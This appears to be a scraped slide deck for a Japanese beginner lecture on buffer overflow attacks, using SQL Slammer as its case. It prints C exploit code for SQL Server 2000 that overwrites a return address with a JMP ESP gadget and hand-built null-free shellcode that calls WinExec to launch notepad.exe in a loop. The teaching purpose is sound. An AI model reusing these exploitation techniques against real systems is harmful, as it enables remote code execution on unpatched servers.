Recommandé
Contenu connexe
Tendances
Tendances (20)
Similaire à No.2 超初心者向け セキュリティ入門
Similaire à No.2 超初心者向け セキュリティ入門 (20)
Plus de Study Group by SciencePark Corp.
Plus de Study Group by SciencePark Corp. (20)
No.2 超初心者向け セキュリティ入門
- 1. Copyright©2019 SciencePark Corp. 1 No.2 超初心者向け セキュリティ入門 サイエンスパーク株式会社 三浦秀朗
- 2. • この講義は「超初心者向けのセキュリティ入門」です • C言語はわかるけど、アセンブラはよくわからないと いう方向けです。 - 社内IT管理者 - ネットワークシステム構築管理者・エンジニア • わかりやすくするため比喩を用いた表現が多く、厳密 にはすべてを解説できない部分が多いです それでもOKな方はご参加ください!! はじめに 2
- 3. 三浦秀朗(みうらひであき)- miura-hacking-mode ・Windows95からWindows用デバイスドライバを多数開発 ・WDMドライバの有償セミナー(Windows98~)を多数開催 ・NTドライバプログラミング(SOFTBANK)の翻訳・監修 ・Compuware DriverStudio翻訳・国内サポート・セミナー ・セキュリティ製品及びSDKの開発 ~この間、暗黒期~ ・某ゲーム機器会社に出向(約5年) - FreeBSD系のデバイスドライバ開発を担当 ・某セキュリティコンサル会社に出向中(約2年~現在) - IoT機器のH/W~S/Wまでの脆弱性診断担当 3 発表者
- 4. • Buffer Overflow攻撃のおさらい • 予備知識 • 攻撃コード解説 目次 3
- 6. 6 ハッキングの王道:Buffer Overflow C言語の例: void main(int argc, char **argv) { func(argv[1]); } void func(char *input) { char tmp[8]; strcpy(tmp, input); } コード用 メモリ スタック メモリ tmp[8] 処理後に 戻る アドレス main() { func(...) } func() 正常時はmain()から呼び出した func()の直後を指しているのだが・・・
- 7. 7 コード用 メモリ スタック メモリ tmp[8] tmp[8] を超えた データ main() { func(...) } func() tmp[]バッファをオーバーフローしたデータ で戻る場所が上書きされた・・・ ? C言語の例: void main(int argc, char **argv) { func(argv[1]); } void func(char *input) { char tmp[8]; strcpy(tmp, input); } ハッキングの王道:Buffer Overflow
- 9. SQL Slammer 世界で最初にBOFによる大きな被害を出した攻撃 2003年1月25日5時30分 (UTC) に発生 Microsoft SQL Server 2000がターゲット MSDE(Microsoft SQL Server Desktop Engine )も含む MSDEは普通のクライアントPCでもよく利用されていた ネットワークのSQL発行用ポート経由で侵入 不正なSQL文を送り込んで任意のコードを実行 ⇒感染台数は僅か10分で7万5000台以上! 9 BOFによるハッキング例
- 10. 予備知識 10
- 11. 11 開発環境 - MinGW
- 12. 12 文字(SQL文)入力インタフェースへの攻撃 SQL Server 2000 SQL文を送るふりをして文字列+攻撃プログラムを送る 注意!!: 送り込むデータに0x00が含まれると文字列のNULLと判断され、それ以上の送信ができなくなります ↓ アセンブラを駆使して、0x00が出てこないように工夫します SQL Slammer sqlsort.dll 0x42B0C9DCという 数値(JMP ESP命令)
- 13. 13 プログラムとスタック(Intel x86) プログラムメモリ スタックメモリ CPU ・・・ PUSH EBP MOV EBP, ESP SUB ESP, 40H PUSHAD ・・・ CPUはプログラムメモリを順 に読んで実行していきます レジスタはCPU内部の 記憶領域です レジスタでは収まらない 一時データ領域 CALL命令の戻り番地 CALL命令の引数 スタックは様々な用途で 用いられます 動的に生成した プログラム ここにプログラムを置いて 実行することもできます (危険)
- 15. 15 使用するx86命令 命令 機能 例 PUSH レジスタやメモリの値をスタックに積み上げます PUSH EBP PUSHAD MOV xxからyyに値を代入します MOV EBP, ESP ADD xxにyyを加算します ADD EDI, 06h SUB xxにyyを減算します SUB ESP, 40H JMP xx番地のプログラムを実行します JMP ESP CALL xx番地のプログラムをサブルーチンとして実行し ます (戻り番地を自動的にスタックに積み上げます) CALL EAX LEA MOV命令と似ているが、アドレスの中身を代入す るのではなく、アドレス値自体を代入する LEA EAX, [EBP-0Dh]
- 16. 攻撃コードの解説 16
- 17. 17 攻撃コード - ネットワーク&バッファ満たす void Attack(char *target_ip, struct sockaddr_in *s_sa) { char request[4000]; memset(request, 0, sizeof(request)); // ネットワークの初期化 int ErrorLevel = StartWinsock(target_ip, s_sa); if (ErrorLevel == 0) { printf("Error starting Winsock.n"); return; } // SQL ServerにSQL文を送る時のコマンド strcat(request, "x04"); // SQL Serverのコマンドバッファをあふれる寸前にする strcat(request, "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOO OOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");
- 18. 18 攻撃コード - スタック上のコードを実行させる // 0x42B0C9DC <- JMP ESP in sqlsort.dll (0xFFE4) strcat(request, "xDCxC9xB0x42"); // -> Part0へジャンプするだけ(オフセット=0xe) strcat(request, "xEBx0E"); strcat(request, "x41x42x43x44x45x46"); // -> Dummy strcat(request, "xFFxFFxFFxFF"); // -> Dummy strcat(request, "xFFxFFxFFxFF"); // -> Dummy // just a few nops // Part0 strcat(request, "x90x90x90x90x90x90x90x90");
- 19. 19 外部プロセスを起動するAPI UINT WinExec( LPCSTR lpCmdLine, UINT uCmdShow ); パラメータ: lpCmdLine・・・コマンドライン文字列 nCmdShow・・・実行時に画面表示をするか否かを指定 notepad.exeを無限に起動してみよう!!
- 20. 20 攻撃コード - 一般的なプログラムの前準備 // Part1 strcat(request, "x55"); // PUSH EBP strcat(request, "x8BxEC"); // MOV EBP, ESP →今のスタック位置を保存しておく strcat(request, "x83xECx40"); // SUB ESP, 40H →自分で使う変数分(0x40)、スタックを確保しておく strcat(request, "x60"); // PUSHAD →一応全部のレジスタを保存しておく(いらないかも)
- 21. 21 攻撃コード - "notepad.exe"をスタックに入れる // notepad.exe strcat(request, "xC6x45xF3x6E"); // MOV BYTE PTR [EBP-0Dh] -> 'n' strcat(request, "xC6x45xF4x6F"); // MOV BYTE PTR [EBP-0Ch] -> 'o' strcat(request, "xC6x45xF5x74"); // MOV BYTE PTR [EBP-0Bh] -> 't' strcat(request, "xC6x45xF6x65"); // MOV BYTE PTR [EBP-0Ah] -> 'e' strcat(request, "xC6x45xF7x70"); // MOV BYTE PTR [EBP-09h] -> 'p' strcat(request, "xC6x45xF8x61"); // MOV BYTE PTR [EBP-08h] -> 'a' strcat(request, "xC6x45xF9x64"); // MOV BYTE PTR [EBP-07h] -> 'd' strcat(request, "xC6x45xFAx2E"); // MOV BYTE PTR [EBP-06h] -> '.' strcat(request, "xC6x45xFBx65"); // MOV BYTE PTR [EBP-05h] -> 'e' strcat(request, "xC6x45xFCx78"); // MOV BYTE PTR [EBP-04h] -> 'x' strcat(request, "xC6x45xFDx65"); // MOV BYTE PTR [EBP-03h] -> 'e' strcat(request, "xC6x45xFExFF"); // MOV BYTE PTR [EBP-02h] -> 0xff strcat(request, "x80x45xFEx01"); // SUB BYTE PTR [EBP-02h], 01h <-偽NULL
- 22. 22 WinExecを実行して無限ループ // 「MOV EDI, 00000005h」と書きたいがNULLが入ってしまうので、FFFFFFFFh-06hで代用 strcat(request, "xBFxFFxFFxFFxFF"); // MOV EDI, FFFFFFFFh // 0xFFFFFFFFhに0x06を足して、0x05にする strcat(request, "x83xC7x06"); // ADD EDI, 06h (EDI <- 0x05) strcat(request, "x57"); // PUSH EDI uCmdShow=SW_SHOW(0x05) strcat(request, “x8Dx45xF3”); // LEA EAX, [EBP-0Dh] “notepad.exe”の先頭番地->EAX strcat(request, “x50”); // PUSH EAX lpCmdLine=“notepad.exe” strcat(request, "xB8x01x86xE6x77"); // MOV EAX, 0x77E68601 (WinExec@kernel32.dll) strcat(request, "xFFxD0"); // CALL EAX strcat(request, "xEBxB6"); // JMP ここから-54バイト
- 23. • Windowsが動作するパソコンがあればハンズオン参加できます • 無料ツールだけ使います(MinGW) • ソースコードは別途ご案内します • 被攻撃サーバーはこちらで用意します 23 次回 - 攻撃のハンズオン